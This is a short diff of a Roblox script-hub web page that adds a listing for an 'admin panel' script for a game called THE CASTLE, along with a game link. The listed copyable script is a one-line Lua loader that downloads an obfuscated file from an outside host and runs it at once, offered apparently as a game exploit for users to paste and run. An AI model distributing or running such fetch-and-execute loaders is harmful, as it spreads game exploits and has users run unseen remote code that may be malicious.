--- a/index.html
+++ b/index.html
@@ -463,14 +463,14 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">a</div>
-    <div class="subheader">a</div>
-    <div class="script-code">a
+    <div class="script-header">THE CASTLE👁️ [FANMADE] 2</div>
+    <div class="subheader">An admin panel! (MUST HAVE ATLEAST ONE REVIVE)</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/TC-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/130491334574811/Free-Donation-Spinner')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/17883142987/THE-CASTLE-FANMADE')">Game link</button>
     </div>
 </div>
 
